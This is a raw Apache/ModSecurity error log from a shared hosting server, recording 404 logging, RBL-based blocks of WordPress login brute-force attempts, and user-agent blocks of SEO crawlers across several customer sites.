[Tue May 26 19:43:38.892862 2026] [security2:error] [pid 77894:tid 78080] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqkjomEhVPuJoD1MZYfgAAADg"]
[Tue May 26 19:43:39.524017 2026] [security2:error] [pid 77894:tid 77990] [remote 51.91.98.45:57152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqkzomEhVPuJoD1MZYowAAbV8"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:43:39.978970 2026] [security2:error] [pid 77894:tid 77994] [remote 74.207.252.187:34264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.252.207.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWqkzomEhVPuJoD1MZYrwAAEWM"]
[Tue May 26 19:43:40.096351 2026] [security2:error] [pid 77894:tid 78053] [client 46.8.57.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqlDomEhVPuJoD1MZYwQAAAB0"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1227851&moderation-hash=05651ddd5f1226a81fa86682dbbcd09d
[Tue May 26 19:43:40.320360 2026] [security2:error] [pid 77894:tid 78101] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqkzomEhVPuJoD1MZYsgAAAE0"]
[Tue May 26 19:43:40.751575 2026] [security2:error] [pid 77894:tid 77999] [remote 74.207.252.187:34264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.252.207.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWqlDomEhVPuJoD1MZY1wAAVmg"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:43:41.552304 2026] [security2:error] [pid 77894:tid 77930] [remote 47.128.99.81:35986] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/"] [unique_id "ahWqlTomEhVPuJoD1MZY5wAARyM"]
[Tue May 26 19:43:43.014775 2026] [autoindex:error] [pid 77894:tid 78025] [client 198.235.24.53:64956] AH01276: Cannot serve directory /home2/svijakqj/cercledepdy.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:43:43.541614 2026] [security2:error] [pid 77894:tid 78099] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqlzomEhVPuJoD1MZZGgAAAEs"]
[Tue May 26 19:43:46.153089 2026] [security2:error] [pid 77894:tid 78147] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqmTomEhVPuJoD1MZZYwAAAHs"]
[Tue May 26 19:43:46.439973 2026] [security2:error] [pid 77894:tid 78127] [client 46.8.57.191:60409] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWqmTomEhVPuJoD1MZZagAAAGc"], referer: https://anujtradingco.com
[Tue May 26 19:43:47.819853 2026] [security2:error] [pid 77894:tid 78136] [client 76.158.237.77:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqmzomEhVPuJoD1MZZlAAAAHA"]
[Tue May 26 19:43:48.911793 2026] [security2:error] [pid 77894:tid 78087] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqnDomEhVPuJoD1MZZtQAAAD8"]
[Tue May 26 19:43:51.578359 2026] [security2:error] [pid 77894:tid 78065] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqnzomEhVPuJoD1MZaCAAAACk"]
[Tue May 26 19:43:51.957799 2026] [security2:error] [pid 77894:tid 78109] [client 114.119.159.26:32043] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/google-ads-paketleri/"] [unique_id "ahWqnzomEhVPuJoD1MZaGwAAAFU"], referer: https://trickyairbedshocks.com/s/cdn/?cagmedya.com
[Tue May 26 19:43:53.964450 2026] [security2:error] [pid 77894:tid 77915] [remote 66.116.199.98:51216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.199.116.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqoTomEhVPuJoD1MZaVgAAMhQ"]
[Tue May 26 19:43:53.972828 2026] [security2:error] [pid 77894:tid 78092] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqoTomEhVPuJoD1MZaTwAAAEQ"]
[Tue May 26 19:43:54.929519 2026] [security2:error] [pid 77894:tid 78048] [client 198.244.242.13:24700] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "jhonweb.com"] [uri "/robots.txt"] [unique_id "ahWqojomEhVPuJoD1MZaewAAABg"]
[Tue May 26 19:43:54.932000 2026] [security2:error] [pid 77894:tid 78048] [client 198.244.242.13:24700] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "jhonweb.com"] [uri "/robots.txt"] [unique_id "ahWqojomEhVPuJoD1MZaewAAABg"]
[Tue May 26 19:43:56.285367 2026] [security2:error] [pid 77894:tid 78114] [client 54.39.0.246:49228] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "jhonweb.com"] [uri "/"] [unique_id "ahWqpDomEhVPuJoD1MZaqQAAAFo"]
[Tue May 26 19:43:56.285501 2026] [security2:error] [pid 77894:tid 78114] [client 54.39.0.246:49228] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "jhonweb.com"] [uri "/"] [unique_id "ahWqpDomEhVPuJoD1MZaqQAAAFo"]
[Tue May 26 19:43:56.705313 2026] [security2:error] [pid 77894:tid 78108] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqpDomEhVPuJoD1MZarAAAAFQ"]
[Tue May 26 19:43:56.912315 2026] [security2:error] [pid 77894:tid 77924] [remote 66.116.199.98:51216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.199.116.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqpDomEhVPuJoD1MZavwAAKx0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:43:57.221042 2026] [security2:error] [pid 77894:tid 77926] [remote 46.20.146.46:47830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWqpTomEhVPuJoD1MZawwAAYx8"]
[Tue May 26 19:43:57.706312 2026] [security2:error] [pid 77894:tid 77928] [remote 46.20.146.46:47830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWqpTomEhVPuJoD1MZa0wAAQyE"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 19:43:58.296306 2026] [security2:error] [pid 77894:tid 78136] [client 62.244.225.226:40301] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWqpjomEhVPuJoD1MZa3wAAAHA"]
[Tue May 26 19:43:58.559077 2026] [security2:error] [pid 77894:tid 78028] [client 85.208.96.204:58494] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/6/"] [unique_id "ahWqpjomEhVPuJoD1MZa8wAAAAQ"]
[Tue May 26 19:43:58.559243 2026] [security2:error] [pid 77894:tid 78028] [client 85.208.96.204:58494] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/6/"] [unique_id "ahWqpjomEhVPuJoD1MZa8wAAAAQ"]
[Tue May 26 19:43:58.662550 2026] [security2:error] [pid 77894:tid 77931] [remote 209.42.19.17:37560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWqpjomEhVPuJoD1MZa8AAAIyQ"]
[Tue May 26 19:43:59.384734 2026] [security2:error] [pid 77894:tid 78056] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqpjomEhVPuJoD1MZbBAAAACA"]
[Tue May 26 19:44:01.984191 2026] [security2:error] [pid 77894:tid 78075] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqqTomEhVPuJoD1MZbQwAAADM"]
[Tue May 26 19:44:03.578876 2026] [security2:error] [pid 77894:tid 77942] [remote 173.249.21.166:56706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqqzomEhVPuJoD1MZbggAAQy8"]
[Tue May 26 19:44:04.566903 2026] [security2:error] [pid 77894:tid 78120] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqrDomEhVPuJoD1MZbmgAAAGA"]
[Tue May 26 19:44:06.340528 2026] [security2:error] [pid 77894:tid 77949] [remote 92.205.188.156:33312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqrjomEhVPuJoD1MZb0wAAYTY"]
[Tue May 26 19:44:06.840707 2026] [security2:error] [pid 77894:tid 77967] [remote 74.7.241.58:36002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWqrjomEhVPuJoD1MZb4wAAPEg"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-includes
[Tue May 26 19:44:07.306660 2026] [security2:error] [pid 77894:tid 78125] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqrjomEhVPuJoD1MZb5gAAAGU"]
[Tue May 26 19:44:09.000496 2026] [security2:error] [pid 77894:tid 77954] [remote 92.205.188.156:33312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqsDomEhVPuJoD1MZcHgAAaTs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:44:09.699891 2026] [security2:error] [pid 77894:tid 77953] [remote 217.112.89.35:56664] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqsTomEhVPuJoD1MZcLwAAITo"]
[Tue May 26 19:44:09.766059 2026] [security2:error] [pid 77894:tid 78097] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqsTomEhVPuJoD1MZcJwAAAEk"]
[Tue May 26 19:44:11.802630 2026] [security2:error] [pid 77894:tid 78144] [client 14.242.3.148:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqszomEhVPuJoD1MZcbwAAAHg"]
[Tue May 26 19:44:12.296143 2026] [security2:error] [pid 77894:tid 78139] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqszomEhVPuJoD1MZcgwAAAHM"]
[Tue May 26 19:44:14.613785 2026] [security2:error] [pid 77894:tid 78128] [client 193.37.33.155:46259] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWqtjomEhVPuJoD1MZczQAAAGg"]
[Tue May 26 19:44:14.941215 2026] [security2:error] [pid 77894:tid 78127] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqtjomEhVPuJoD1MZc0wAAAGc"]
[Tue May 26 19:44:15.035141 2026] [security2:error] [pid 77894:tid 78109] [client 102.164.188.174:16775] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/compta/bank/various_payment/card.php"] [unique_id "ahWqtjomEhVPuJoD1MZc6QAAVVI"], referer: https://erp.azurmediatec.com/compta/bank/various_payment/card.php?id=294&action=clone
[Tue May 26 19:44:15.941152 2026] [autoindex:error] [pid 77894:tid 78056] [client 124.221.140.98:34840] AH01276: Cannot serve directory /home2/restmwhm/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:44:17.550642 2026] [security2:error] [pid 77894:tid 78059] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWquTomEhVPuJoD1MZdKQAAACM"]
[Tue May 26 19:44:18.819459 2026] [security2:error] [pid 77894:tid 78095] [client 74.7.175.140:44620] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.makwasi.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWqujomEhVPuJoD1MZdZAAAR10"]
[Tue May 26 19:44:20.147382 2026] [security2:error] [pid 77894:tid 78121] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWquzomEhVPuJoD1MZdfwAAAGE"]
[Tue May 26 19:44:22.126461 2026] [security2:error] [pid 77894:tid 78119] [client 43.134.43.82:30371] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "panda-eco.com"] [uri "/wp-content/uploads/2024/05/privacy-policy.pdf"] [unique_id "ahWqvjomEhVPuJoD1MZdwgAAAF8"]
[Tue May 26 19:44:22.126570 2026] [security2:error] [pid 77894:tid 78119] [client 43.134.43.82:30371] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "panda-eco.com"] [uri "/wp-content/uploads/2024/05/privacy-policy.pdf"] [unique_id "ahWqvjomEhVPuJoD1MZdwgAAAF8"]
[Tue May 26 19:44:22.355440 2026] [security2:error] [pid 77894:tid 78143] [client 92.222.108.118:53418] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.acacia.org.in"] [uri "/robots.txt"] [unique_id "ahWqvjomEhVPuJoD1MZdxgAAAHc"]
[Tue May 26 19:44:22.355575 2026] [security2:error] [pid 77894:tid 78143] [client 92.222.108.118:53418] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.acacia.org.in"] [uri "/robots.txt"] [unique_id "ahWqvjomEhVPuJoD1MZdxgAAAHc"]
[Tue May 26 19:44:22.794103 2026] [security2:error] [pid 77894:tid 78136] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqvjomEhVPuJoD1MZdyQAAAHA"]
[Tue May 26 19:44:23.412035 2026] [security2:error] [pid 77894:tid 78141] [client 66.249.68.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWqvzomEhVPuJoD1MZd4wAAAHU"]
[Tue May 26 19:44:23.727695 2026] [security2:error] [pid 77894:tid 78033] [client 167.114.139.53:45602] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.acacia.org.in"] [uri "/"] [unique_id "ahWqvzomEhVPuJoD1MZd9AAAAAk"]
[Tue May 26 19:44:23.727794 2026] [security2:error] [pid 77894:tid 78033] [client 167.114.139.53:45602] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.acacia.org.in"] [uri "/"] [unique_id "ahWqvzomEhVPuJoD1MZd9AAAAAk"]
[Tue May 26 19:44:23.841366 2026] [security2:error] [pid 77894:tid 78091] [client 196.51.97.133:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqvzomEhVPuJoD1MZd9wAAAEM"], referer: https://www.anujtradingco.com/
[Tue May 26 19:44:25.222698 2026] [security2:error] [pid 77894:tid 78146] [client 196.51.97.133:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqwTomEhVPuJoD1MZeLQAAAHo"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1280661&moderation-hash=635f273bee50743c651750021935dde8
[Tue May 26 19:44:25.308975 2026] [security2:error] [pid 77894:tid 78059] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqwDomEhVPuJoD1MZeGgAAACM"]
[Tue May 26 19:44:27.925517 2026] [security2:error] [pid 77894:tid 78108] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqwzomEhVPuJoD1MZeeQAAAFQ"]
